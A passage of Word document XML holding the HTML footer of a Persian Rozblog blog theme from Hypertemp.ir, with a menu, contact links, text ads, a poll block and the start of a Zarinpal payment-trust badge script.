    <w:p w14:paraId="2AB429D2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_User_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB53999" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_User_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F9A65" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="6782D92C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D26DF0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D05AD1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438DA77" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Users End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4421FF91" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="67562CB9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFEA73F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Hypertemp End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17630743" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4D1A540E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="06177834" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Footer Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B1192" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DEE19" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="main-f"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F409AE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="07240E76" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Menu Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B8BD4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul class="menu"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263FF805" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li class="home"&gt;&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>صفحه اصل</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>" href="/"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>صفحه اصل</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A8D89" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>انجمن</w:t>
      </w:r>
      <w:r>
        <w:t>" href="/forum"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>انجمن</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4CA0A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ورود</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="nofollow" href="#particles-js"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ورود</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB7B27C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>عضو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t>" rel="nofollow" href="#particles-js"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>عضو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t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446F226" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تماس با ما</w:t>
      </w:r>
      <w:r>
        <w:t>" href="/contact"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تماس با ما</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C470FF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سامانه طراح</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>" class="design" href="http://www.hypertemp.ir/page/design"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سامانه طراح</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2FD4A2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a class="channel" href="http://telegram.me/hypertempir" target="_blank" rel="nofollow"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>کانال اطلاع رسان</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD1734" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="6C700340" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20399488" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03D6A2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Menu End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4DEBA8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="3A56479A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Contact Lins Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B05A1EF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="block-f contact"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42221023" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title"&gt;&lt;h4&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>راه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ارتباط با ما</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h4&gt;&lt;span&gt;contact&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD1DF0A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul class="content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216651AF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;samp&gt;</w:t>
      </w:r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تلگرام</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/samp&gt;&lt;i class="fa fa-paper-plane"&gt;&lt;/i&gt;&lt;span&gt;&lt;a href="http://telegram.me/t" target="_blank" title="</w:t>
      </w:r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تلگرام ادم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پرتمپ</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="nofollow"&gt;sport_blue2&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D587240" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;li&gt;&lt;samp&gt;</w:t>
      </w:r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نستاگرام</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/samp&gt;&lt;i class="fa fa-instagram"&gt;&lt;/i&gt;&lt;span&gt;&lt;a href="https://www.instagram.com/saeed.moradi_22" target="_blank" title="</w:t>
      </w:r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نستاگرام</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ادم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پرتمپ</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="nofollow"&gt;saeed.moradi_22&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7523EC9F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;samp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>شماره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امک</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/samp&gt;&lt;i class="fa fa-phone"&gt;&lt;/i&gt;&lt;span&gt;0936622027&lt;/span&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3974D6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;samp&gt;</w:t>
      </w:r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t>&lt;/samp&gt;&lt;i class="fa fa-envelope"&gt;&lt;/i&gt;&lt;span&gt;&lt;a href="mailto:kianooshcfz@gmail.com" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال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به ادم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پرتمپ</w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;seyed.saeed.moradi@gmail.com&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44374A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;samp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>فرم تماس با ما</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/samp&gt;&lt;i class="fa fa-pencil"&gt;&lt;/i&gt;&lt;span&gt;&lt;a href="/contact" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تماس با ما</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="nofollow"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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مشاهده فرم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&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A1455" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BAE3DC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC446BE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Contact Lins End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA9601" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2AB979EF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Text Ads Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288789F0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Block=7&gt;&lt;RB:Custom_Option_Title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> متن</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C373EE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="block-f text-ads"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F43770F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title"&gt;&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> متن</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;&lt;span&gt;text ads&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B4F31" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0059F55A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Content&gt;&lt;a href="https://rarible.com/user/0xda6da9e544d3a526d8147fbdb2d5f7521e75ddc9/owned/" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>عکس پروفا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t>" rel="follow"&gt;NFT&lt;/a&gt;&lt;a href="http://www.hypertemp.ir/page/ads" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="follow"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>محل 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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;a href="https://rarible.com/user/0xda6da9e544d3a526d8147fbdb2d5f7521e75ddc9/owned/" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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 NFT " rel="follow"&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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 NFT &lt;/a&gt;&lt;a href="http://www.hypertemp.ir/cat/2/weblog.html" target="_blank" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">قالب </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:rtl/>
        </w:rPr>
        <w:t>رزبلاگ</w:t>
      </w:r>
      <w:r>
        <w:t>" rel="follow"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>قالب رزبلاگ</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/RB:Custom_Option_Content&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16263C6A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E86342" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534BE64" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2378BF19" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Text Ads End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47E178" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="62A1AC0E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="6F5291C4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4DAEEFA2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Text Ads Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BF530" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;RB:Blog_Poll_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A1C62" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="block-f poll"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CFD5A9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title"&gt;&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نظرسنجي سايت</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;&lt;i class="fa fa-pie-chart"&gt;&lt;/i&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D448A31" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul class="poll"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19762C74" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Poll&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65942FE3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;RB:Poll_Submit_Value: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ثبت نظر</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FDF7D4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;RB:Poll_Result_Value: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نتايج</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1923C2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Poll_Item_Style:&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D959B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Poll_Submit_Style:font-size:13px;padding:3px 0px;background-color:#00897b;color:#fff;width:49%;float:right;border:0px;border-radius:3px;margin-top:8px;cursor:pointer;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E12F43" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;PollFormResultStyle:font-size:13px;padding:3px 0px;background-color:#00897b;color:#fff;width:49%;float:right;border:0px;border-radius:3px;margin-top:8px;cursor:pointer;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF1EA0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>[Poll_Name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A6DD41" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>[Poll_Items]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82EDA4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Poll&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E37D0D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734138B5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829618E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56904A58" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Text Ads End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7880EFED" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="05814EC3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4CB74576" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Top &amp; Zarinpal Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0A9AB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="top-namad"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9CAE2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript"&gt;function showZPTrust(){window.open("https://www.zarinpal.com/webservice/verifyWebsite/"+window.location.hostname,null,"width=656, height=500, scrollbars=no, resizable=no")}document.write('&lt;a href="javascript:showZPTrust();" rel="nofollow" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>دروازه پرداخت معتبر</w:t>
      </w:r>
